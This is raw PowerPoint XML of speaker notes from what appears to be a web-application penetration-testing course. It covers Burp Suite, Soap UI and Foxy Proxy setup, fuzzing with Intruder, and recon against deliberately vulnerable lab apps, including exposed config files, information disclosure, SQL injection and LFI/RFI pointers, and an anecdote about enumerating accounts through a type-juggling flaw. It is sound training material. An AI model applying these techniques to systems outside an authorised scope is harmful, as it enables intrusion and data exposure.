        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="345813122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Optionally you can use Soap UI to send requests. With</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Soap UI you can either load a WSDL file or fetch it from a server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>This method is using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> to fetch the WSDL file and save it locally. </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142</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12130965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Create a new SOAP project in Soap UI.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>143</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="301628814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If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> you used </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>, browse to the directory where the output file is stored. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>If you want to fetch the WSDL paste in the URL to the WSDL (Hint: you might need to update the proxy if you are getting java errors).</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144</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="414451045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Once the WSDL is parsed you will see the methods</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> in the tree view on the left.</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145</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426103439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Adjust the Soap UI proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> preferences which can be found under File-&gt;Preferences-&gt;Proxy Settings.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Either turn off the proxy or route it through Burp.</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146</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73294370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Replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the ? with a user name and send the request and view the response.</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147</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="69716730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152</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4134227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Automate fuzzing or attacks to quickly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> see results. Run through Repeater first to understand good </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> bad requests for filtering. I normally send a good and bad request to the Comparer tool to help find small differences in the response for this.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use CTRL+I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> or CMD+I to send a request to the Intruder tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Send a request from the Target, Proxy, Repeater tabs to begin fuzzing.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Set target and port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Choose items to fuzz</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select payload or list of values to submit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Select attack type</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View results</a:t>
            </a:r>
          </a:p>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16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2668815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Download or update 3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>rd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> party extensions for Burp. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Toggle which extensions are loaded.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Can be saved with project options, so they are loaded at startup.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Configure paths for Java, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Jython</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and Ruby</a:t>
            </a:r>
          </a:p>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18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2831638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The VM will work with Virtual</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Box and VM Ware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Web Applications found on the VM:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Dojo-basic</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Dojo-scavenger</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Dvwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> – damn vulnerable web app</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Mutillidae</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>bWAPP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0"/>
          </a:p>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19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="650032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an advanced attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> using type juggling. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>json</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> data in the request had an id, any id other than what it knew about the logged in user was invalid until the integer was too large to check the value against. At this point it then checked the type, and as both were integers still, the method would return true. Once this was found in Repeater, I was able to send to Intruder and list each account in the system even though I should not be able access this list or anything outside of my account. </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20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1062125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If</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> not using Foxy Proxy, set the browsers proxy in this method. If using Chrome you will have to start the browser from the command line and add the proxy options before starting the browser.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>As the VM has Foxy Proxy installed, we will be using it, instead of this method. To use Foxy Proxy the radio selection needs to be set to: Use system proxy settings.</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21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="223667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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2242106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Click on the Foxy Proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> Icon and then select Use proxy “Burp Suite” for all URLs.</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22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="913396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In Firefox visit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> dojo-basic web application, but don’t do anything with the web application yet.</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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="623080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Once dojo-basic has been added to the scope, set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the filter in the HTTP History window to only show in-scope items.</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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1115434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If your pent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>scope allows, set the Protocol to Any, and then wildcard the Port and File sections.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> This will help when scanning to find http paths when only https should be used. </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25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2441695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UID is base 64 encoded</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We now</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> know the table accounts exits, with a column of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>cid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> and no protection was taken to avoid </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> injection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Check to see if admin is logged in – not yet, but thanks for the information.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>register.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> – check for LFI/RFI</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26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1388706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In the browser, manually</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> walk through the web application to build a site map in the target tab. Do not click on the links found under </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> help.</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27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1655562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Let Burp spider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the host for you to see what it comes up with.</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28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1683099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The automated scanner found some interesting items for us. We will look at the robots file to see what we need to look at, and what they think we shouldn’t look at.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2711926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Let Burp spider</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> the host for you to see what it comes up with.</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30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2675426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Forced directory and file browsing using only the built-in short list.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{501DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2434030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1DE96E-990A-254F-8974-0B036143DDCC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39843160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Apparently the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> passwords directory and the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>config.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> file are not to be browsed by any bots. What is the site administrator/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>dev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> team trying to conceal in a very bad way?</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32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2732769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Better to view in Burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> than in the browser.</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33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2575616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Why</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> does the browser not show anything?</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34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="537500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Information</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> disclosure with the error page that is returned. /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>config.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Server header discloses web server type (Apache), version (2.4.7) and the underlying OS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>/Ubuntu)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicParenR"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t>Looks like the default 404 page for Apache</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35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1301858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PHP code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> is visible in Proxy because the file extension does not force it to be interpreted by PHP before going out of Apache. </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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38872537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These files were copied from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>config.inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and are not part of the VM – just used as a demonstration:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Myconfig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Myconfig.inc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Myconfig.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the browser with no extension the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> code is not displayed as it is interpreted by the browser and there are no html elements inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> code.</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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2838339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the browser with a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> extension the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> code is not displayed as it is interpreted by the browser and there are no html elements inside the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1529534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the browser with a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> extension the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code is interpreted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> on the server before going out through Apache.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>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39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21338578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With no file extension the proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> will show the contents of the file and the code is not interpreted on the server.</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40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="166013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With a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1"/>
              <a:t>inc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file extension the proxy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0"/>
